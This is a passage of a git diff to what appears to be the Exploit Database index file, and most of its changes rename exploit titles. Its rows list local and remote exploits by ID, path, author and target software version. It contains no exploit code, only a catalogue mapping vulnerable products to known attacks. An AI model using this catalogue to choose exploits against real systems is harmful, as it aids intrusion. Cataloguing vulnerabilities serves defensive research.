'btkrnl.sys' Driver Privilege Escalation",2012-10-18,"Nikita Tarakanov",windows,local,0 37975,platforms/linux/local/37975.py,"ZSNES 1.51 - Buffer Overflow",2015-08-26,"Juan Sacco",linux,local,0 37987,platforms/linux/local/37987.py,"FENIX 0.92 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0 @@ -8643,7 +8646,7 @@ id,file,description,date,author,platform,type,port 38137,platforms/osx/local/38137.txt,"Apple Mac OSX Install.Framework - Arbitrary mkdir / unlink and chown to Admin Group",2015-09-10,"Google Security Research",osx,local,0 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0 38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 -38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0 +38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - 'eReg.exe' Buffer Overflow (SEH Unicode)",2015-09-11,"Robbie Corley",windows,local,0 40975,platforms/android/local/40975.rb,"Google Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0 38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 (Build 10130) - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 @@ -8683,7 +8686,7 @@ id,file,description,date,author,platform,type,port 38472,platforms/windows/local/38472.py,"Blat 2.7.6 SMTP / NNTP Mailer - Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0 38473,platforms/linux/local/38473.py,"Linux 3.17 - noexec File Security Bypass (Python ctypes and memfd_create)",2015-10-15,soyer,linux,local,0 38474,platforms/windows/local/38474.txt,"Microsoft Windows 10 - Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0 -38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc_ nudragn_ rungga_reksya",windows,local,0 +38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - Stack Overflow (SEH)",2015-10-18,"yokoacc_ nudragn_ rungga_reksya",windows,local,0 38504,platforms/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,windows,local,0 38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - Based Stack Overflow (SEH) (ASLR + DEP Bypass)",2015-10-25,g00dv1n,windows,local,0 38533,platforms/windows/local/38533.c,"Microsoft Windows 10 - pcap Driver Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0 @@ -8716,8 +8719,8 @@ id,file,description,date,author,platform,type,port 39061,platforms/android/local/39061.txt,"GoToMeeting for Android - Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",android,local,0 39102,platforms/windows/local/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local,0 39112,platforms/linux/local/39112.txt,"QNX - '.Phgrafx' File Enumeration",2014-03-10,cenobyte,linux,local,0 -39120,platforms/windows/local/39120.py,"KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP_ Denial of Service 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 -39121,platforms/windows/local/39121.py,"KiTTY Portable 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)",2015-12-29,"Guillaume Kaddouch",windows,local,0 +39120,platforms/windows/local/39120.py,"KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP / Denial of Service 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 +39121,platforms/windows/local/39121.py,"KiTTY Portable 0.65.0.2p (Windows 7) - Local kitty.ini Overflow (Wow64 Egghunter)",2015-12-29,"Guillaume Kaddouch",windows,local,0 39122,platforms/windows/local/39122.py,"KiTTY Portable 0.65.0.2p (Windows 8.1/10) - Local kitty.ini Overflow",2015-12-29,"Guillaume Kaddouch",windows,local,0 39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0 39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Privilege Escalation",2015-12-30,"Larry W. Cashdollar",linux,local,0 @@ -8748,7 +8751,7 @@ id,file,description,date,author,platform,type,port 39443,platforms/windows/local/39443.py,"Delta Industrial Automation DCISoft 1.12.09 - Stack Buffer Overflow",2016-02-15,LiquidWorm,windows,local,0 39446,platforms/win_x86/local/39446.py,"Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0 39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow (PoC)",2016-02-22,INSECT.B,windows,local,0 -39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0 +39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Escalation",2016-02-29,Laughing_Mantis,windows,local,0 39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0 39520,platforms/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Privilege Escalation",2016-03-02,Cr4sh,win_x86-64,local,0 39523,platforms/windows/local/39523.rb,"AppLocker - Execution Prevention Bypass (Metasploit)",2016-03-03,Metasploit,windows,local,0 @@ -8757,11 +8760,11 @@ id,file,description,date,author,platform,type,port 39535,platforms/linux/local/39535.sh,"Exim 4.84-3 - Privilege Escalation",2016-03-09,"Hacker Fantastic",linux,local,0 39549,platforms/linux/local/39549.txt,"Exim < 4.86.2 - Privilege Escalation",2016-03-10,"Dawid Golunski",linux,local,0 39574,platforms/win_x86/local/39574.cs,"Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",win_x86,local,0 -39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit",2016-03-21,"Rakan Alotaibi",windows,local,0 +39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode (SEH)",2016-03-21,"Rakan Alotaibi",windows,local,0 39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - '.m3u' Stack Overflow",2016-03-22,"Charley Celice",windows,local,0 39595,platforms/multiple/local/39595.txt,"Apple Mac OSX / iOS - SUID Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0 39628,platforms/linux/local/39628.txt,"FireEye - Malware Input Processor (uid=mip) Privilege Escalation",2016-03-28,"Google Security Research",linux,local,0 -39630,platforms/windows/local/39630.g,"Cogent Datahub 7.3.9 Gamma Script - Elevation of Privilege",2016-03-28,mr_me,windows,local,0 +39630,platforms/windows/local/39630.g,"Cogent Datahub 7.3.9 Gamma Script - Privilege Escalation",2016-03-28,mr_me,windows,local,0 39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0 39666,platforms/windows/local/39666.txt,"Microsoft Windows Kernel - 'win32k.sys' Privilege Escalation (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0 39670,platforms/windows/local/39670.txt,"Panda Security URL Filtering < 4.3.1.9 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0 @@ -8800,11 +8803,11 @@ id,file,description,date,author,platform,type,port 39903,platforms/windows/local/39903.txt,"League of Legends Screensaver - Insecure File Permissions Privilege Escalation",2016-06-07,"Vincent Yiu",windows,local,0 39908,platforms/windows/local/39908.txt,"Matrix42 Remote Control Host 3.20.0031 - Unquoted Path Privilege Escalation",2016-06-10,"Roland C. Redl",windows,local,0 39916,platforms/windows/local/39916.txt,"Riot Games League of Legends - Insecure File Permissions Privilege Escalation",2016-06-10,"Cyril Vallicari",windows,local,0 -39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass)",2016-06-13,"Fitzl Csaba",windows,local,0 +39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File Exploit (Universal ASLR + DEP Bypass)",2016-06-13,"Fitzl Csaba",windows,local,0 39938,platforms/linux/local/39938.rb,"iSQL 1.0 - Command Injection",2016-06-13,HaHwul,linux,local,0 39954,platforms/windows/local/39954.txt,"AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation",2016-06-15,"Cyril Vallicari",windows,local,0 40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local,0 -39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0 +39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - Stack Overflow (SEH) (Metasploit)",2016-06-20,s0nk3y,windows,local,0 39984,platforms/win_x86-64/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,win_x86-64,local,0 39992,platforms/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",linux,local,0 40017,platforms/windows/local/40017.py,"Mediacoder 0.8.43.5830 - '.m3u' Buffer Overflow (SEH)",2016-06-27,"Sibusiso Sishi",windows,local,0 @@ -8825,11 +8828,11 @@ id,file,description,date,author,platform,type,port 40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051)",2016-06-22,"Brian Pak",windows,local,0 40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Privilege Escalation",2016-07-20,LiquidWorm,windows,local,0 40141,platforms/bsd/local/40141.c,"NetBSD mail.local(8) - Privilege Escalation (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0 -40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0 -40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - '.m3u' Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0 +40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' (SEH)",2016-07-25,"Karn Ganeshen",windows,local,0 +40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0 40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0 40169,platforms/linux/local/40169.txt,"VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation",2013-08-22,"Tavis Ormandy",linux,local,0 -40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - '.pls' Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0 +40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0 40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0 40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0 40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0 @@ -8842,7 +8845,7 @@ id,file,description,date,author,platform,type,port 40323,platforms/windows/local/40323.txt,"ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,windows,local,0 40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0 40438,platforms/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local,0 -40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Elevation of Privilege",2016-09-30,Tulpa,windows,local,0 +40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,windows,local,0 40443,platforms/windows/local/40443.txt,"Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,windows,local,0 40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0 40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0 @@ -8896,7 +8899,7 @@ id,file,description,date,author,platform,type,port 40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access)",2016-10-19,"Phil Oester",linux,local,0 40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0 40627,platforms/win_x86/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",win_x86,local,0 -40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0 +40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - Local Buffer Overflow (SEH)",2016-10-25,n30m1nd,windows,local,0 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0 40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0 40653,platforms/osx/local/40653.txt,"Apple OS X/iOS Kernel - IOSurface Use-After-Free",2016-10-31,"Google Security Research",osx,local,0 @@ -9048,6 +9051,7 @@ id,file,description,date,author,platform,type,port 42157,platforms/windows/local/42157.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-10,abatchy17,windows,local,0 42160,platforms/windows/local/42160.py,"DiskBoss 8.0.16 - 'Input Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local,0 42161,platforms/windows/local/42161.py,"Sync Breeze 9.7.26 - 'Add Exclude Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local,0 +42163,platforms/windows/local/42163.py,"Disk Pulse 9.7.26 - 'Add Directory' Local Buffer Overflow",2017-06-12,abatchy17,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -9715,7 +9719,7 @@ id,file,description,date,author,platform,type,port 3740,platforms/windows/remote/3740.c,"Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow",2007-04-15,devcode,windows,remote,139 3746,platforms/windows/remote/3746.txt,"Microsoft Windows - DNS RPC - Remote Buffer Overflow (2)",2007-04-18,"Andres Tarasco",windows,remote,445 3787,platforms/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - Remote Format String (exec-shield)",2007-04-24,Xpl017Elz,linux,remote,143 -3804,platforms/windows/remote/3804.txt,"Microsoft Windows - '.ani' GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0 +3804,platforms/windows/remote/3804.txt,"Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0 3808,platforms/windows/remote/3808.html,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)",2007-04-27,shinnai,windows,remote,0 3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX - 'iPIX-ImageWell-ipix.dll' Buffer Overflow",2007-04-27,"Umesh Wanve",windows,remote,0 3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0 @@ -9908,7 +9912,7 @@ id,file,description,date,author,platform,type,port 4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 - API ActiveX Control Buffer Overflow",2007-12-31,Elazar,windows,remote,0 4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow",2008-01-07,"Thomas Pollet",linux,remote,0 4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow",2008-01-08,ryujin,windows,remote,0 -4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - SEH Overflow",2008-01-08,Elazar,windows,remote,0 +4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - Overflow (SEH)",2008-01-08,Elazar,windows,remote,0 4869,platforms/windows/remote/4869.html,"Gateway Weblaunch - ActiveX Control Insecure Method",2008-01-08,Elazar,windows,remote,0 4873,platforms/windows/remote/4873.html,"Microsoft FoxServer - 'vfp6r.dll 6.0.8862.0' ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0 4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method",2008-01-09,shinnai,windows,remote,0 @@ -9978,7 +9982,7 @@ id,file,description,date,author,platform,type,port 5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Code Execution",2008-03-21,"Pranav Joshi",hardware,remote,0 5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (1)",2008-03-26,meathive,hardware,remote,0 5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69 -5315,platforms/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote SEH Overflow",2008-03-26,muts,windows,remote,69 +5315,platforms/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)",2008-03-26,muts,windows,remote,69 5330,platforms/win_x86/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,win_x86,remote,80 5332,platforms/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote,0 5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,windows,remote,0 @@ -10029,7 +10033,7 @@ id,file,description,date,author,platform,type,port 6026,platforms/linux/remote/6026.pl,"Fonality trixbox - 'langChoice' Parameter Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 6045,platforms/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Parameter Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80 -6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0 +6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Escalation",2008-07-17,eliteboy,linux,remote,0 6100,platforms/win_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,win_x86,remote,80 6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-22,"Guido Landi",windows,remote,0 6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution",2008-07-22,Koshi,windows,remote,0 @@ -10049,7 +10053,7 @@ id,file,description,date,author,platform,type,port 6229,platforms/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)",2008-08-11,"Simon Ryeo",multiple,remote,0 6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 - (randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0 6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow",2008-08-13,kralor,windows,remote,0 -6248,platforms/windows/remote/6248.pl,"FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH STACK Overflow",2008-08-15,SkOd,windows,remote,21 +6248,platforms/windows/remote/6248.pl,"FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH Stack Overflow",2008-08-15,SkOd,windows,remote,21 6256,platforms/windows/remote/6256.pl,"FlashGet 1.9.0.1012 - 'FTP PWD Response' Buffer Overflow (SafeSEH)",2008-08-17,"Guido Landi",windows,remote,0 6278,platforms/windows/remote/6278.txt,"Anzio Web Print Object 3.2.30 - ActiveX Buffer Overflow",2008-08-20,"Core Security",windows,remote,0 6302,platforms/windows/remote/6302.pl,"Dana IRC 1.4a - Remote Buffer Overflow",2008-08-25,"Guido Landi",windows,remote,0 @@ -10094,7 +10098,7 @@ id,file,description,date,author,platform,type,port 6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22 6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)",2008-10-23,"Aviv Raff",windows,remote,0 6828,platforms/windows/remote/6828.html,"db Software Laboratory VImpX - 'VImpX.ocx' Multiple Vulnerabilities",2008-10-24,shinnai,windows,remote,0 -6840,platforms/windows/remote/6840.html,"PowerTCP FTP module - Multiple Technique Exploit (SEH/HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0 +6840,platforms/windows/remote/6840.html,"PowerTCP FTP module - Multiple Technique Exploit (SEH HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0 6841,platforms/windows/remote/6841.txt,"Microsoft Windows Server - Code Execution (MS08-067) (Universal)",2008-10-26,EMM,windows,remote,135 6870,platforms/windows/remote/6870.html,"MW6 Aztec ActiveX - 'Aztec.dll' Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6871,platforms/windows/remote/6871.html,"MW6 Barcode ActiveX - 'Barcode.dll' Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 @@ -10465,7 +10469,7 @@ id,file,description,date,author,platform,type,port 10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0 14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0 10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager - 'OmniInet.exe' Buffer Overflow",2009-12-26,EgiX,windows,remote,5555 -10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - SEH Exploit",2009-12-29,Lincoln,windows,remote,6660 +10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - (SEH) Exploit",2009-12-29,Lincoln,windows,remote,6660 10791,platforms/windows/remote/10791.py,"Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80 10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Exploit",2010-01-02,Lincoln,windows,remote,0 10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,windows,remote,0 @@ -10576,7 +10580,7 @@ id,file,description,date,author,platform,type,port 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote,0 13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies - Web Server Remote Poison Null Byte Exploit",2010-06-13,kingcope,multiple,remote,80 13853,platforms/linux/remote/13853.pl,"UnrealIRCd 3.2.8.1 - Remote Downloader/Execute Trojan",2010-06-13,anonymous,linux,remote,0 -13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - SEH Exploit",2010-06-17,b0nd,windows,remote,0 +13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - (SEH) Exploit",2010-06-17,b0nd,windows,remote,0 13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0 14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0 @@ -10713,7 +10717,7 @@ id,file,description,date,author,platform,type,port 15802,platforms/windows/remote/15802.txt,"ecava IntegraXor 3.6.4000.0 - Directory Traversal",2010-12-21,"Luigi Auriemma",windows,remote,0 15806,platforms/linux/remote/15806.txt,"Citrix Access Gateway - Command Injection",2010-12-22,"George D. Gal",linux,remote,0 15809,platforms/windows/remote/15809.html,"Microsoft WMITools ActiveX - Remote Command Execution",2010-12-22,WooYun,windows,remote,0 -15834,platforms/windows/remote/15834.py,"Kolibri 2.0 - Buffer Overflow RET + SEH Exploit (HEAD)",2010-12-26,TheLeader,windows,remote,0 +15834,platforms/windows/remote/15834.py,"Kolibri 2.0 - (HEAD) Buffer Overflow RET + (SEH)",2010-12-26,TheLeader,windows,remote,0 15842,platforms/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",hardware,remote,0 15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 15862,platforms/windows/remote/15862.txt,"quickphp Web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 @@ -11379,7 +11383,7 @@ id,file,description,date,author,platform,type,port 17491,platforms/unix/remote/17491.rb,"vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)",2011-07-05,Metasploit,unix,remote,0 17498,platforms/windows/remote/17498.rb,"Freefloat FTP Server - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,remote,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",hardware,remote,0 -39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - SEH Overflow (Metasploit)",2016-04-05,Metasploit,windows,remote,80 +39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - Overflow (SEH) (Metasploit)",2016-04-05,Metasploit,windows,remote,80 39662,platforms/windows/remote/39662.rb,"PCMan FTP Server Buffer Overflow - 'PUT' Command (Metasploit)",2016-04-05,Metasploit,windows,remote,21 17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Buffer Overflow (Metasploit)",2011-07-09,Metasploit,windows,remote,0 17517,platforms/windows/remote/17517.txt,"Symantec Backup Exec 12.5 - MiTM Attack",2011-07-09,Nibin,windows,remote,0 @@ -11474,7 +11478,7 @@ id,file,description,date,author,platform,type,port 18291,platforms/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS) Exploit",2011-12-30,cheffner,hardware,remote,0 18984,platforms/multiple/remote/18984.rb,"Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit)",2012-06-05,Metasploit,multiple,remote,0 18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 - ST (RRQ) Buffer Overflow",2012-01-10,b33f,windows,remote,0 -18354,platforms/windows/remote/18354.py,"WorldMail IMAPd 3.0 - SEH Overflow (Egg Hunter)",2012-01-12,TheXero,windows,remote,0 +18354,platforms/windows/remote/18354.py,"WorldMail IMAPd 3.0 - Overflow (SEH) (Egg Hunter)",2012-01-12,TheXero,windows,remote,0 18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport - Remote Command Execution (Metasploit)",2012-01-17,Metasploit,windows,remote,0 18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit)",2012-01-14,Metasploit,windows,remote,0 18367,platforms/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload (Metasploit)",2012-01-14,Metasploit,windows,remote,0 @@ -11505,7 +11509,7 @@ id,file,description,date,author,platform,type,port 